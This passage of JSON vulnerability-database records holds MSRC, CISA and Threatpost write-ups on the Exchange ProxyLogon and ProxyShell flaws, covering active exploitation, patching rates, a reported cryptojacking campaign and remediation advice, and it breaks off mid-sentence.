"2023-05-23T15:35:29", "description": "Update August 25, 2021: Microsoft strongly recommends that you update your servers with the most recent security updates available. 
CVE-2021-34473 (ProxyShell) CVE-2021-34523 (ProxyShell) CVE-2021-33766 Today is Update Tuesday \u2013 our commitment to provide a predictable monthly schedule to release updates and provide the latest protection to our customers. Update Tuesday is a monthly cycle when Microsoft releases patches for vulnerabilities that we have found proactively or that have been disclosed to us through our security partnerships under a coordinated vulnerability disclosure.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-13T07:00:00", "type": "msrc", "title": "April 2021 Update Tuesday packages now available", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33766", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-04-13T07:00:00", "id": "MSRC:C28CD823FBB321014DB6D53A28DA0CD1", "href": "/blog/2021/04/april-2021-update-tuesday-packages-now-available/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-03T15:51:43", "description": "Update August 25, 2021: Microsoft strongly recommends that you update your servers with the most recent security updates 
available. CVE-2021-34473 (ProxyShell) CVE-2021-34523 (ProxyShell) CVE-2021-33766 Today is Update Tuesday \u2013 our commitment to provide a predictable monthly schedule to release updates and provide the latest protection to our customers. Update Tuesday is a monthly cycle when Microsoft releases patches for vulnerabilities that we have found proactively or that have been disclosed to us through our security partnerships under a coordinated vulnerability disclosure.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-13T07:00:00", "type": "msrc", "title": "April 2021 Update Tuesday packages now available", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33766", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-04-13T07:00:00", "id": "MSRC:8F98074A1D86F9B965ADC16597E286ED", "href": "https://msrc.microsoft.com/blog/2021/04/april-2021-update-tuesday-packages-now-available/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2021-03-10T18:11:04", "description": "Microsoft has released out-of-band security updates to address vulnerabilities 
affecting Microsoft Exchange Server 2013, 2016, and 2019. A remote attacker can exploit three remote code execution vulnerabilities\u2014CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065\u2014to take control of an affected system and can exploit one vulnerability\u2014CVE-2021-26855\u2014to obtain access to sensitive information. These vulnerabilities are being actively exploited in the wild.\n\nCISA encourages users and administrators to review the [Microsoft blog post](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>) and apply the necessary updates or workarounds.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-02T00:00:00", "type": "cisa", "title": "Microsoft Releases Out-of-Band Security Updates for Exchange Server", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": 
"AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-02T00:00:00", "id": "CISA:16DE226AFC5A22020B20927D63742D98", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/03/02/microsoft-releases-out-band-security-updates-exchange-server", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-22T22:07:03", "description": "Malicious cyber actors are actively exploiting the following ProxyShell vulnerabilities: [CVE-2021-34473](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473>), [CVE-2021-34523](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523>), and [CVE-2021-31207](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31207>). An attacker exploiting these vulnerabilities could execute arbitrary code on a vulnerable machine. CISA strongly urges organizations to identify vulnerable systems on their networks and immediately apply [Microsoft's Security Update from May 2021](<https://us-cert.cisa.gov/ncas/current-activity/2021/05/11/microsoft-releases-may-2021-security-updates>)\u2014which remediates all three ProxyShell vulnerabilities\u2014to protect against these attacks. 
\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-21T00:00:00", "type": "cisa", "title": "Urgent: Protect Against Active Exploitation of ProxyShell Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-08-21T00:00:00", "id": "CISA:8C51810D4AACDCCDBF9D526B4C21660C", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/08/21/urgent-protect-against-active-exploitation-proxyshell", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2021-03-26T19:00:10", "description": "The patching level for Microsoft Exchange Servers that are vulnerable to the 
[ProxyLogon group of security bugs](<https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/>) has reached 92 percent, according to Microsoft.\n\nThe computing giant [tweeted out the stat](<https://twitter.com/msftsecresponse/status/1374075310195412992>) earlier this week \u2013 though of course patching won\u2019t fix already-compromised machines. Still, that\u2019s an improvement of 43 percent just since last week, Microsoft pointed out (using telemetry from RiskIQ).\n\n> Our work continues, but we are seeing strong momentum for on-premises Exchange Server updates: \n> \u2022 92% of worldwide Exchange IPs are now patched or mitigated. \n> \u2022 43% improvement worldwide in the last week. [pic.twitter.com/YhgpnMdlOX](<https://t.co/YhgpnMdlOX>)\n> \n> \u2014 Security Response (@msftsecresponse) [March 22, 2021](<https://twitter.com/msftsecresponse/status/1374075310195412992?ref_src=twsrc%5Etfw>)\n\nProxyLogon consists of four flaws (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065) that can be chained together to create a pre-authentication remote code execution (RCE) exploit \u2013 meaning that attackers can take over servers without knowing any valid account credentials. This gives them access to email communications and the opportunity to install a web shell for further exploitation within the environment.\n\nThe good news on patching comes as a whirlwind of ProxyLogon cyberattacks has hit companies across the globe, with multiple advanced persistent threats (APT) and possibly other adversaries moving quickly to exploit the bug. 
A spate of public proof-of-concept exploits has added fuel to the fire \u2013 which is blazing so bright that F-Secure said on Sunday that hacks are occurring \u201cfaster than we can count,\u201d with tens of thousands of machines compromised.\n\n\u201cTo make matters worse, proof-of-concept automated attack scripts are being made publicly available, making it possible for even unskilled attackers to quickly gain remote control of a vulnerable Microsoft Exchange Server,\u201d according to [F-Secure\u2019s writeup](<https://blog.f-secure.com/microsoft-exchange-proxylogon/>). \u201cThere is even a fully functioning package for exploiting the vulnerability chain published to the Metasploit application, which is commonly used for both hacking- and security testing. This free-for-all attack opportunity is now being exploited by vast numbers of criminal gangs, state-backed threat actors and opportunistic script kiddies.\u201d\n\nThe attackers are using ProxyLogon to carry out a range of attacks, including data theft and the installation of malware, such as the recently discovered \u201cBlackKingdom\u201d strain. According to Sophos, the ransomware operators are asking for $10,000 in Bitcoin in exchange for an encryption key.\n\n## **Patching Remains Tough for Many**\n\nThe CyberNews investigation team [found](<https://cybernews.com/news/patched-microsoft-exchange-servers-give-a-false-sense-of-security-says-cisas-brandon-wales/>) 62,174 potentially vulnerable unpatched Microsoft Exchange Servers around the world, as of Wednesday.\n\n
Source: CyberNews.\n\nVictor Wieczorek, practice director for Threat & Attack Simulation at GuidePoint Security, noted that some organizations are not structured or resourced to patch effectively against ProxyLogon.\n\n\u201cThis is because, 1) a lack of accurate asset inventory and ownership information; and 2) lag time to vet patching for negative impacts on the business and gain approval from asset/business owners to patch,\u201d he told Threatpost. \u201cIf you don\u2019t have an accurate inventory with a high level of confidence, it takes a long time to hunt down affected systems. You have to determine who owns them and if applying the patch would negatively impact the system\u2019s function. Responsible and timely patching takes lots of proactive planning and tracking.\u201d\n\nHe added that by regularly testing existing controls (red-teaming), searching for indicators of existing weakness and active threats (threat hunting), and investing/correcting confirmed vulnerabilities (vulnerability management), organizations are going to be in a much better spot to adjust to emerging vulnerabilities and invoke their incident-response capabilities when needed.\n\n## **APT Activity Continues**\n\nMicrosoft said in early March that it [had spotted multiple zero-day exploits](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) in the wild being used to attack on-premises versions of Microsoft Exchange servers.\n\nAnd indeed, Microsoft noted that adversaries from a Chinese APT called Hafnium were able to access email accounts, steal a raft of data and drop malware on target machines for long-term remote access. 
It\u2019s also apparent that Hafnium isn\u2019t the only party of interest, according to multiple researchers; [ESET said earlier in March](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>) that at least 10 different APTs are using the exploit.\n\nThe sheer volume of APTs mounting attacks, most of them starting in the days before ProxyLogon became publicly known, has prompted questions as to the exploit\u2019s provenance \u2013 and ESET researchers mused whether it was shared around the Dark Web on a wide scale.\n\nThe APTs seem mainly bent on cyberespionage and data theft, researchers said.\n\n\u201cThese breaches could be occurring in the background, completely unnoticed. Only after months or years will it become clear what was stolen,\u201d according to F-Secure. \u201cIf an attacker knows what they are doing, the data has most likely already been stolen or is being stolen right now.\u201d\n\nSeveral versions of the on-premise flavor of Exchange are vulnerable to the four bugs, including Exchange 2013, 2016 and 2019. Cloud-based and hosted versions are not vulnerable to ProxyLogon.\n\n## **Patching is Not Enough; Assume Compromise**\n\nUnfortunately, installing the ProxyLogon security patches alone does not guarantee that a server is secure \u2013 an attacker may have breached it before the update was installed.\n\n\u201cPatching is like closing a door. Therefore, 92 percent of the doors have been closed. But the doors were open for a relatively long time and known to all the bad actors,\u201d Oliver Tavakoli, CTO at Vectra, told Threatpost. 
\u201cIdentifying and remediating already compromised systems will be a lot harder.\u201d\n\nBrandon Wales, the acting director for the Cybersecurity and Infrastructure Security Agency (CISA), said during a webinar this week that \u201cpatching is not sufficient.\u201d\n\n\u201cWe know that multiple adversaries have compromised networks prior to patches being applied,\u201d Wales said during a [Cipher Brief webinar](<https://cybernews.com/news/patched-microsoft-exchange-servers-give-a-false-sense-of-security-says-cisas-brandon-wales/>). He added, \u201cYou should not have a false sense of security. You should fully understand the risk. In this case, how to identify whether your system is already compromised, how to remediate it, and whether you should bring in a third party if you are not capable of doing that.\u201d\n\n## **How Businesses Can Protect Against ProxyLogon**\n\nYonatan Amitay, Security Researcher at Vulcan Cyber, told Threatpost that a successful response to mitigate Microsoft Exchange vulnerabilities should consist of the following steps:\n\n * Deploy updates to affected Exchange Servers.\n * Investigate for exploitation or indicators of persistence.\n * Remediate any identified exploitation or persistence and investigate your environment for indicators of lateral movement or further compromise.\n\n\u201cIf for some reason you cannot update your Exchange servers immediately, Microsoft has released instructions for how to mitigate these vulnerabilities through reconfiguration \u2014 here, as they recognize that applying the latest patches to Exchange servers may take time and planning, especially if organizations are not on recent versions and/or associated cumulative and security patches,\u201d he said. 
\u201cNote that the mitigations suggested are not substitutes for installing the updates.\u201d\n\nMicrosoft also has issued a one-click mitigation and remediation tool for small- and medium-sized businesses in light of the ongoing swells of attacks.\n\nVectra\u2019s Tavakoli noted that the mitigation guides and tools Microsoft has supplied don\u2019t necessarily help post-compromise \u2013 they are intended to provide mitigation in advance of fully patching the Exchange server.\n\n\u201cThe end result of a compromise is reflective of the M.O. of each attack group, and that will be far more variable and less amenable to automated cleanup,\u201d he said.\n\nMilan Patel, global head of MSS for BlueVoyant, said that identifying follow-on malicious activity after the bad guys have gotten access to a network requires a good inventory of where data is housed.\n\n\u201cIncident response is a critical reactive tool that will help address what data could have been touched or stolen by the bad guys after they gained access to the critical systems,\u201d he told Threatpost. \u201cThis is critical, this could mean the difference between a small cleanup effort vs. 
potential litigation because sensitive data was stolen from the network.\u201d\n", "cvss3": {}, "published": "2021-03-24T18:39:26", "type": "threatpost", "title": "Microsoft Exchange Servers See ProxyLogon Patching Frenzy", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-24T18:39:26", "id": "THREATPOST:BADA213290027D414693E838771F8645", "href": "https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-04T21:57:55", "description": "Hot on the heels of Microsoft\u2019s announcement about active cyber-espionage campaigns that are [exploiting four serious security vulnerabilities](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) in Microsoft Exchange Server, the U.S. 
government is mandating patching for the issues.\n\nThe news comes as security firms report escalating numbers of related campaigns led by sophisticated adversaries against a range of high-value targets, especially in the U.S.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) has issued an emergency directive, warning that its partners have observed active exploitation of the bugs in Microsoft Exchange on-premises products, which allow attackers to have \u201cpersistent system access and control of an enterprise network.\u201d\n\n\u201cCISA has determined that this exploitation of Microsoft Exchange on-premises products poses an unacceptable risk to Federal Civilian Executive Branch agencies and requires emergency action,\u201d reads the [March 3 alert](<https://cyber.dhs.gov/ed/21-02/>). \u201cThis determination is based on the current exploitation of these vulnerabilities in the wild, the likelihood of the vulnerabilities being exploited, the prevalence of the affected software in the federal enterprise, the high potential for a compromise of agency information systems and the potential impact of a successful compromise.\u201d\n\n## **Rapidly Spreading Exchange Server Attacks**\n\nEarlier this week Microsoft said that it had spotted multiple zero-day exploits in the wild being used to attack on-premises versions of Microsoft Exchange Server, spurring it to release [out-of-band patches](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>).\n\nThe exploited bugs are being tracked as CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065. When chained together, they allow remote authentication bypass and remote code execution. 
Adversaries have been able to access email accounts, steal a raft of data and drop malware on target machines for long-term remote access, according to the computing giant.\n\nThe attacks are being carried out in part by a China-linked advanced persistent threat (APT) called Hafnium, Microsoft said \u2013 but multiple other security firms have observed attacks from other groups and against a widespread swathe of targets.\n\nResearchers at Huntress Labs for instance told Threatpost that its researchers have discovered more than 200 web shells deployed across thousands of vulnerable servers (with antivirus and endpoint detection/recovery installed), and it expects this number to keep rising.\n\n\u201cThe team is seeing organizations of all shapes and sizes affected, including electricity companies, local/county governments, healthcare providers and banks/financial institutions, as well as small hotels, multiple senior citizen communities and other mid-market businesses,\u201d a spokesperson at Huntress told Threatpost.\n\nMeanwhile, researchers at ESET tweeted that CVE-2021-26855 was being actively exploited in the wild by at least three APTs besides Hafnium.\n\n\u201cAmong them, we identified #LuckyMouse, #Tick, #Calypso and a few additional yet-unclassified clusters,\u201d it tweeted, adding that while most attacks are against targets in the U.S., \u201cwe\u2019ve seen attacks against servers in Europe, Asia and the Middle East.\u201d\n\n> Most targets are located in the US but we\u2019ve seen attacks against servers in Europe, Asia and the Middle East. Targeted verticals include governments, law firms, private companies and medical facilities. 
3/5 [pic.twitter.com/kwxjYPeMlm](<https://t.co/kwxjYPeMlm>)\n> \n> \u2014 ESET research (@ESETresearch) [March 2, 2021](<https://twitter.com/ESETresearch/status/1366862951156695047?ref_src=twsrc%5Etfw>)\n\nThe vulnerabilities only exist in on-premise versions of Exchange Server, and don\u2019t affect Office 365 and virtual instances. Yet despite the move to the cloud, there are plenty of physical servers still in service, leaving a wide pool of targets.\n\n\u201cWith organizations migrating to Microsoft Office 365 en masse over the last few years, it\u2019s easy to forget that on-premises Exchange servers are still in service,\u201d Saryu Nayyar, CEO, Gurucul, said via email. \u201cSome organizations, notably in government, can\u2019t migrate their applications to the cloud due to policy or regulation, which means we will see on-premises servers for some time to come.\u201d\n\n## **CISA Mandates Patching Exchange Servers**\n\nCISA is requiring federal agencies to take several steps in light of the spreading attacks.\n\nFirst, they should take a thorough inventory of all on-premises Microsoft Exchange Servers in their environments, and then perform forensics to identify any existing compromises. Any compromises must be reported to CISA for remediation.\n\nThe forensics step would include collecting \u201csystem memory, system web logs, windows event logs and all registry hives. Agencies shall then examine the artifacts for indications of compromise or anomalous behavior, such as credential dumping and other activities.\u201d\n\nIf no indicators of compromise have been found, agencies must immediately patch, CISA added. 
And if agencies can\u2019t immediately patch, then they must take their Microsoft Exchange Servers offline.\n\nAll agencies have also been told to submit an initial report by Friday on their current situation.\n\n\u201c[This] highlights the increasing frequency of attacks orchestrated by nation states,\u201d said Steve Forbes, government cybersecurity expert at Nominet, via email. \u201cThe increasing role of government agencies in leading a coordinated response against attacks. CISA\u2019s directive for agencies to report back on their level of exposure, apply security fixes or disconnect the program is the latest in a series of increasingly regular emergency directives that the agency has issued since it was established two years ago. Vulnerabilities like these demonstrate the necessity for these coordinated national protective measures to efficiently and effectively mitigate the effects of attacks that could have major national security implications.\u201d\n", "cvss3": {}, "published": "2021-03-04T17:08:36", "type": "threatpost", "title": "CISA Orders Fed Agencies to Patch Exchange Servers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-04T17:08:36", "id": "THREATPOST:54430D004FBAE464FB7480BC724DBCC8", "href": "https://threatpost.com/cisa-federal-agencies-patch-exchange-servers/164499/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-04-15T12:28:24", "description": "Cryptojacking can be added to the list of threats that face any [unpatched Exchange servers](<https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/>) that remain vulnerable to the now-infamous ProxyLogon exploit, new research has found.\n\nResearchers discovered the threat actors using Exchange servers compromised using the highly publicized exploit chain\u2014which suffered a [barrage of 
attacks](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>) from advanced persistent threat (APT) groups to infect systems with everything from [ransomware](<https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/>) to webshells\u2014to host Monero cryptomining malware, according to [a report](<https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/>) posted online this week by SophosLabs.\n\n\u201cAn unknown attacker has been attempting to leverage what\u2019s now known as the ProxyLogon exploit to foist a malicious Monero cryptominer onto Exchange servers, with the payload being hosted on a compromised Exchange server,\u201d Sophos principal researcher Andrew Brandt wrote in the report. \n[](<https://threatpost.com/newsletter-sign/>)\n\nResearchers were inspecting telemetry when they discovered what they deemed an \u201cunusual attack\u201d targeting the customer\u2019s Exchange server. Sophos researchers Fraser Howard and Simon Porter were instrumental in the discovery and analysis of the novel threat, Brandt acknowledged.\n\nResearchers said they detected the executables associated with this attack as Mal/Inject-GV and XMR-Stak Miner (PUA), according to the report. Researchers published a list of [indicators of compromise](<https://github.com/sophoslabs/IoCs/blob/master/PUA-QuickCPU_xmr-stak.csv>) on the SophosLabs GitHub page to help organizations recognize if they\u2019ve been attacked in this way.\n\n## **How It Works**\n\nThe attack as observed by researchers began with a PowerShell command to retrieve a file named win_r.zip from another compromised server\u2019s Outlook Web Access logon path (/owa/auth), according to the report. 
Under closer inspection, the .zip file was not a compressed archive at all but a batch script that then invoked the built-into-Windows certutil.exe program to download two additional files, win_s.zip and win_d.zip, which also were not compressed.\n\nThe first file is written out to the filesystem as QuickCPU.b64, an executable payload in base64 that can be decoded by the certutil application, which by design can decode base64-encoded security certificates, researchers observed.\n\nThe batch script then runs another command that outputs the decoded executable into the same directory. Once decoded, the batch script runs the executable, which extracts the miner and configuration data from the QuickCPU.dat file, injects it into a system process, and then deletes any evidence that it was there, according to the report.\n\nThe executable in the attack appears to contain a modified version of a tool publicly available on Github called PEx64-Injector, which is [described](<https://github.com/0xyg3n/PEx64-Injector>) on its Github page as having the ability to \u201cmigrate any x64 exe to any x64 process\u201d with \u201cno administrator privileges required,\u201d according to the report.\n\nOnce the file runs on an infected system, it extracts the contents of the QuickCPU.dat file, which includes an installer for the cryptominer and its configuration temporarily to the filesystem. It then configures the miner, injects it into a running process, then quits, according to the report. \u201cThe batch file then deletes the evidence and the miner remains running in memory, injected into a process already running on the system,\u201d Brandt wrote.\n\nResearchers observed the cryptominer receiving funds on March 9, which is when Microsoft also released updates to Exchange to patch the flaws. 
Though the attacker lost several servers after this date and the output from the miner decreased, other servers that were gained thereafter more than made up for the early losses, according to the report.\n\n## **Exploit-Chain History**\n\nThe ProxyLogon problem started for Microsoft in early March when the company said it [had spotted multiple zero-day exploits](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) in the wild being used to attack on-premises versions of Microsoft Exchange Server. The exploit chain is comprised of four flaws (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065).\n\nTogether the flaws created a pre-authentication remote code execution (RCE) exploit, meaning attackers can take over servers without knowing any valid account credentials. This gave them access to email communications and the opportunity to install a web shell for further exploitation within the environment.\n\nAs previously mentioned, Microsoft released an out-of-band update [soon after](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) in its scramble to patch the flaws in the ProxyLogon chain; however, while the company boasted later that month that 92 percent of affected machines already had been patched, much damage had already been done, and unpatched systems likely exist that remain vulnerable.\n\n**_Ever wonder what goes on in underground cybercrime forums? Find out on April 21 at 2 p.m. ET during a _**[**_FREE Threatpost event_**](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)**_, \u201cUnderground Markets: A Tour of the Dark Economy.\u201d Experts from Digital Shadows (Austin Merritt) and Sift (Kevin Lee) will take you on a guided tour of the Dark Web, including what\u2019s for sale, how much it costs, how hackers work together and the latest tools available for hackers. 
_**[**_Register here_**](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)**_ for the Wed., April 21 LIVE event. _**\n", "cvss3": {}, "published": "2021-04-15T12:19:13", "type": "threatpost", "title": "Attackers Target ProxyLogon Exploit to Install Cryptojacker", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-04-15T12:19:13", "id": "THREATPOST:B787E57D67AB2F76B899BCC525FF6870", "href": "https://threatpost.com/attackers-target-proxylogon-cryptojacker/165418/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-16T17:23:15", "description": "As dangerous attacks accelerate against Microsoft Exchange Servers in the wake of the disclosure around the [ProxyLogon group of security bugs](<https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/>), a public proof-of-concept (PoC) whirlwind has started up. It\u2019s all leading to a feeding frenzy of cyber-activity.\n\nThe good news, however, is that Microsoft has issued a one-click mitigation and remediation tool in light of the ongoing swells of attacks.\n\nResearchers said that while advanced persistent threats (APTs) were the first to the game when it comes to hacking vulnerable Exchange servers, the public PoCs mean that the cat is officially out of the bag, meaning that less sophisticated cybercriminals can start to leverage the opportunity.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cAPTs\u2026can reverse engineer the patches and make their own PoCs,\u201d Roger Grimes, data-driven defense evangelist at KnowBe4, told Threatpost. 
\u201cBut publicly posted PoCs mean that the thousands of other hacker groups that don\u2019t have that level of sophistication can do it, and even those groups that do have that sophistication can do it faster.\u201d\n\nAfter confirming the efficacy of one of the new public PoCs, security researcher Will Dorman of CERT/CC [tweeted](<https://twitter.com/wdormann/status/1370800181143351296>), \u201cHow did I find this exploit? Hanging out in the dark web? A hacker forum? No. Google search.\u201d\n\n## **What is the ProxyLogon Exploit Against Microsoft Exchange?**\n\nMicrosoft said in early March that it [had spotted multiple zero-day exploits](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) in the wild being used to attack on-premises versions of Microsoft Exchange servers.\n\nFour flaws (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065) can be chained together to create a pre-authentication remote code execution (RCE) exploit \u2013 meaning that attackers can take over servers without knowing any valid account credentials. 
This gives them access to email communications and the opportunity to install a web shell for further exploitation within the environment.\n\nAnd indeed, Microsoft noted that adversaries from a Chinese APT called Hafnium were able to access email accounts, steal a raft of data and drop malware on target machines for long-term remote access.\n\nMicrosoft quickly pushed out out-of-band patches for ProxyLogon, but even so, tens of thousands of organizations have so far been compromised using the exploit chain.\n\nIt\u2019s also apparent that Hafnium isn\u2019t the only party of interest, according to multiple researchers; [ESET said last week](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>) that at least 10 different APTs are using the exploit.\n\nThe sheer volume of APTs mounting attacks, most of them starting in the days before ProxyLogon became publicly known, has prompted questions as to the exploit\u2019s provenance \u2013 and ESET researchers mused whether it was shared around the Dark Web on a wide scale.\n\nSeveral versions of the on-premise flavor of Exchange are vulnerable to the four bugs, including Exchange 2013, 2016 and 2019. Cloud-based and hosted versions are not vulnerable to ProxyLogon.\n\n## **How Many Organizations and Which Ones Remain at Risk?**\n\nMicrosoft originally identified more than 400,000 on-premise Exchange servers that were at-risk when the patches were first released on March 2. Data collected by RiskIQ [indicated that](<https://www.riskiq.com/blog/external-threat-management/microsoft-exchange-server-landscape/?utm_campaign=exchange_landscape_blog>) as of March 14, there were 69,548 Exchange servers that were still vulnerable. 
And in a separate analysis from Kryptos Logic, 62,018 servers are still vulnerable to CVE-2021-26855, the server-side request forgery flaw that allows initial access to Exchange servers.\n\n\u201cWe released one additional set of updates on March 11, and with this, we have released updates covering more than 95 percent of all versions exposed on the internet,\u201d according to [post](<https://www.microsoft.com/security/blog/2021/03/12/protecting-on-premises-exchange-servers-against-recent-attacks/>) published by Microsoft last week.\n\nHowever, Check Point Research (CPR) [said this week](<https://blog.checkpoint.com/2021/03/11/exploits-on-organizations-worldwide/>) that in its latest observations on exploitation attempts, the number of attempted attacks has increased tenfold, from 700 on March 11 to more than 7,200 on March 15.\n\nAccording to CPR\u2019s telemetry, the most-attacked country has been the United States (accounting for 17 percent of all exploit attempts), followed by Germany (6 percent), the United Kingdom (5 percent), the Netherlands (5 percent) and Russia (4 percent).\n\nThe most-targeted industry sector meanwhile has been government/military (23 percent of all exploit attempts), followed by manufacturing (15 percent), banking and financial services (14 percent), software vendors (7 percent) and healthcare (6 percent).\n\n\u201cWhile the numbers are falling, they\u2019re not falling fast enough,\u201d RiskIQ said in its 